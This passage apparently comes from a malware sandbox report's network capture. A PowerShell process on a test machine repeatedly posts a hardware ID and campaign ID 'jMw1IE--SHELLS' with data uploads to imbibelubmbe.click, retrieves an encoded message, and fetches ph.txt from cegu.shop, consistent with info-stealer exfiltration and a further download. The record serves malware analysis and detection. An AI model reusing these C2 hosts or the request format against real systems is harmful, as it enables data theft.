                                                                                              2024-12-31 07:58:27 UTC15331OUTData Raw: 2d 2d 51 37 34 4f 31 37 4f 34 4a 48 41 39 43 4a 36 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 51 37 34 4f 31 37 4f 34 4a 48 41 39 43 4a 36 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 37 34 4f 31 37 4f 34 4a 48 41 39 43 4a 36 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a
                                                                                              Data Ascii: --Q74O17O4JHA9CJ6NOContent-Disposition: form-data; name="hwid"424FBF7F76DF40CB92A467F615F074C7--Q74O17O4JHA9CJ6NOContent-Disposition: form-data; name="pid"2--Q74O17O4JHA9CJ6NOContent-Disposition: form-data; name="lid"jMw1IE--SHELLS
                                                                                              2024-12-31 07:58:27 UTC2827OUTData Raw: 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36
                                                                                              Data Ascii: f5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                              2024-12-31 07:58:27 UTC1129INHTTP/1.1 200 OK
                                                                                              Date: Tue, 31 Dec 2024 07:58:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=9cfbrdot34gr9hauml1rg8ks68; expires=Sat, 26 Apr 2025 01:45:06 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Jk55AHcUIx5Xcg6yhcazwVWlbnW3%2FVodBWlNihcpB4pj7gjBQHbFFAg6jTi0hAI4RSR0bWvX1RgchKFa3jvZ6hVnCV6vHZGOs2JHsEGLujWgOGhTT99Z3a51fV0qUG8%2Fksq36c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8fa8b97b98608ccd-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2009&rtt_var=768&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19121&delivery_rate=1412675&cwnd=195&unsent_bytes=0&cid=e90267b8eb5871ea&ts=701&x=0"
                                                                                              2024-12-31 07:58:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-31 07:58:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449913188.114.97.34435956C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-31 07:58:28 UTC277OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=PNATZCY1T357
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8749
                                                                                              Host: imbibelubmbe.click
                                                                                              2024-12-31 07:58:28 UTC8749OUTData Raw: 2d 2d 50 4e 41 54 5a 43 59 31 54 33 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 50 4e 41 54 5a 43 59 31 54 33 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4e 41 54 5a 43 59 31 54 33 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 50 4e 41 54 5a 43 59 31 54 33 35 37 0d
                                                                                              Data Ascii: --PNATZCY1T357Content-Disposition: form-data; name="hwid"424FBF7F76DF40CB92A467F615F074C7--PNATZCY1T357Content-Disposition: form-data; name="pid"2--PNATZCY1T357Content-Disposition: form-data; name="lid"jMw1IE--SHELLS--PNATZCY1T357
                                                                                              2024-12-31 07:58:28 UTC1133INHTTP/1.1 200 OK
                                                                                              Date: Tue, 31 Dec 2024 07:58:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=4voqta7p24hlo94q1ladf5690s; expires=Sat, 26 Apr 2025 01:45:07 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c34CryI%2B1iqKIX7kdZg6vGli6S10BxaIkIWGHf19OUGV5eLvovL%2BFprVgQs%2BWpbub4%2BCMp6aS4V2frye29CSIFu9VQgug5wVA80Chsn8YqpJ%2B8blrf08E4dDvDYEjZP3qN0o74Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8fa8b9836ff643aa-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1595&rtt_var=611&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9684&delivery_rate=1771844&cwnd=241&unsent_bytes=0&cid=49e756653f93a45c&ts=582&x=0"
                                                                                              2024-12-31 07:58:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-31 07:58:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449919188.114.97.34435956C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-31 07:58:29 UTC279OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=UHJAPGRGYDDYH
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20408
                                                                                              Host: imbibelubmbe.click
                                                                                              2024-12-31 07:58:29 UTC15331OUTData Raw: 2d 2d 55 48 4a 41 50 47 52 47 59 44 44 59 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 55 48 4a 41 50 47 52 47 59 44 44 59 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 48 4a 41 50 47 52 47 59 44 44 59 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 55 48 4a 41 50 47 52 47 59 44
                                                                                              Data Ascii: --UHJAPGRGYDDYHContent-Disposition: form-data; name="hwid"424FBF7F76DF40CB92A467F615F074C7--UHJAPGRGYDDYHContent-Disposition: form-data; name="pid"3--UHJAPGRGYDDYHContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--UHJAPGRGYD
                                                                                              2024-12-31 07:58:29 UTC5077OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                              2024-12-31 07:58:30 UTC1127INHTTP/1.1 200 OK
                                                                                              Date: Tue, 31 Dec 2024 07:58:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=3rkfcdcu7l7dc6krpbg1ldmb3h; expires=Sat, 26 Apr 2025 01:45:08 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VAbRvUQkrmOGcqdQFHINZAw9u5NF0E9zm5NettcyF%2Fsea0UGxxKAC8Ihds07rZHoDoqmxJHTB18Gfh62rKy1LlLhWj0532lOGKB8tP6pmoYO7yvvArNzDjR7nDXmplvg5Ncc4Qo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8fa8b98b2ac08ca5-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1790&rtt_var=694&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21367&delivery_rate=1552365&cwnd=237&unsent_bytes=0&cid=c696899b3f6fb042&ts=621&x=0"
                                                                                              2024-12-31 07:58:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-31 07:58:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449928188.114.97.34435956C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-31 07:58:30 UTC276OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=HDUHR8BAL4U
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1207
                                                                                              Host: imbibelubmbe.click
                                                                                              2024-12-31 07:58:30 UTC1207OUTData Raw: 2d 2d 48 44 55 48 52 38 42 41 4c 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 48 44 55 48 52 38 42 41 4c 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 44 55 48 52 38 42 41 4c 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 48 44 55 48 52 38 42 41 4c 34 55 0d 0a 43 6f 6e
                                                                                              Data Ascii: --HDUHR8BAL4UContent-Disposition: form-data; name="hwid"424FBF7F76DF40CB92A467F615F074C7--HDUHR8BAL4UContent-Disposition: form-data; name="pid"1--HDUHR8BAL4UContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--HDUHR8BAL4UCon
                                                                                              2024-12-31 07:58:31 UTC1126INHTTP/1.1 200 OK
                                                                                              Date: Tue, 31 Dec 2024 07:58:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=igomfl2ot25t6miv1sf7ispf7u; expires=Sat, 26 Apr 2025 01:45:10 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hdA9p2aiqnV97gK0AQ6b864fROH7aAo2f1QNRjS1j76d2jozEv9nG6W7UFKo0kb%2FhVzMO107VZ2vhhHlXkkijAAr09xI5IwVTsygRPEGWEfeYTJ7RX97rOmypEfjs2lOU%2FoDxpM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8fa8b9940839c411-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1493&rtt_var=568&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2119&delivery_rate=1910994&cwnd=224&unsent_bytes=0&cid=36cb583d6ba670e4&ts=457&x=0"
                                                                                              2024-12-31 07:58:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-31 07:58:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.449936188.114.97.34435956C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-31 07:58:31 UTC275OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=3OEVAHF2KS
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1066
                                                                                              Host: imbibelubmbe.click
                                                                                              2024-12-31 07:58:31 UTC1066OUTData Raw: 2d 2d 33 4f 45 56 41 48 46 32 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 33 4f 45 56 41 48 46 32 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 4f 45 56 41 48 46 32 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 33 4f 45 56 41 48 46 32 4b 53 0d 0a 43 6f 6e 74 65 6e 74
                                                                                              Data Ascii: --3OEVAHF2KSContent-Disposition: form-data; name="hwid"424FBF7F76DF40CB92A467F615F074C7--3OEVAHF2KSContent-Disposition: form-data; name="pid"1--3OEVAHF2KSContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--3OEVAHF2KSContent
                                                                                              2024-12-31 07:58:32 UTC1134INHTTP/1.1 200 OK
                                                                                              Date: Tue, 31 Dec 2024 07:58:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=5hkbj3ak7muec5mkf8vj856b6u; expires=Sat, 26 Apr 2025 01:45:11 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3KSxjuXsf%2FKu7W0vwUOsgu%2FSNwhm4FDrVrVrBWTIyHzZwnAp1KyZ%2BJE2pOA3DevJ7gDcc6TsMptVxfw3pwRkK%2BGH%2B6Ki9%2F98JD5kp9lP0fP2sN3vnOVdzYEzkO6FAZZ0OqoFquc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8fa8b99a3876728a-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1957&rtt_var=740&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1977&delivery_rate=1471774&cwnd=227&unsent_bytes=0&cid=965f2e78941a1087&ts=528&x=0"
                                                                                              2024-12-31 07:58:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-31 07:58:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.449945188.114.97.34435956C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-31 07:58:33 UTC267OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 115
                                                                                              Host: imbibelubmbe.click
                                                                                              2024-12-31 07:58:33 UTC115OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37
                                                                                              Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--SHELLS&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=424FBF7F76DF40CB92A467F615F074C7
                                                                                              2024-12-31 07:58:33 UTC1132INHTTP/1.1 200 OK
                                                                                              Date: Tue, 31 Dec 2024 07:58:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=9bguceb3hugat3un0ia8v794gp; expires=Sat, 26 Apr 2025 01:45:12 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I5TWJqb0FPf%2F5OY4sXY3Yn28mnzbVjDsLmx4vXUkb9%2BvtfnASXCRmrotNIOBhZZdTDEmb1pce3CkgfiVHGw1qHvFS7C4CZf5dtd7D1uPhT%2B9w9mVg%2FCgCJomsg63zPZWq1s%2BMA0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8fa8b9a19a6e0c86-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1594&rtt_var=620&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1018&delivery_rate=1731909&cwnd=109&unsent_bytes=0&cid=59beb411a01293f5&ts=560&x=0"
                                                                                              2024-12-31 07:58:33 UTC218INData Raw: 64 34 0d 0a 5a 70 61 2b 79 54 5a 2b 61 66 52 57 58 54 4f 6a 31 43 38 69 76 35 73 45 72 7a 31 7a 32 5a 75 6e 46 64 6f 33 46 75 33 34 59 6e 49 39 37 5a 79 38 46 45 52 4c 6e 43 49 70 51 39 44 75 63 77 33 6a 74 47 66 4b 57 67 62 33 36 4d 39 36 71 6d 73 35 31 63 31 56 52 6c 53 67 6a 50 30 43 53 44 58 62 4a 6a 55 64 31 36 78 62 41 4a 4f 35 59 74 73 66 53 65 75 33 68 58 44 34 44 53 65 51 31 42 6c 51 45 37 53 45 36 31 34 4b 48 59 51 6c 5a 32 2b 4d 69 41 42 4a 30 2f 4a 30 32 55 67 65 73 4f 6a 53 66 50 52 45 66 6f 4b 49 50 6c 30 50 2b 4d 71 57 56 52 49 5a 71 79 55 31 55 6f 32 67 56 31 61 64 74 79 62 4a 53 56 48 6a 71 34 73 33 76 78 55 73 33 59 55 2f 0d 0a
                                                                                              Data Ascii: d4Zpa+yTZ+afRWXTOj1C8iv5sErz1z2ZunFdo3Fu34YnI97Zy8FERLnCIpQ9Ducw3jtGfKWgb36M96qms51c1VRlSgjP0CSDXbJjUd16xbAJO5YtsfSeu3hXD4DSeQ1BlQE7SE614KHYQlZ2+MiABJ0/J02UgesOjSfPREfoKIPl0P+MqWVRIZqyU1Uo2gV1adtybJSVHjq4s3vxUs3YU/
                                                                                              2024-12-31 07:58:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.449951185.161.251.214435956C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-31 07:58:34 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Host: cegu.shop
                                                                                              2024-12-31 07:58:34 UTC249INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.26.2
                                                                                              Date: Tue, 31 Dec 2024 07:58:34 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 329
                                                                                              Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                              Connection: close
                                                                                              ETag: "676c9e2a-149"
                                                                                              Accept-Ranges: bytes
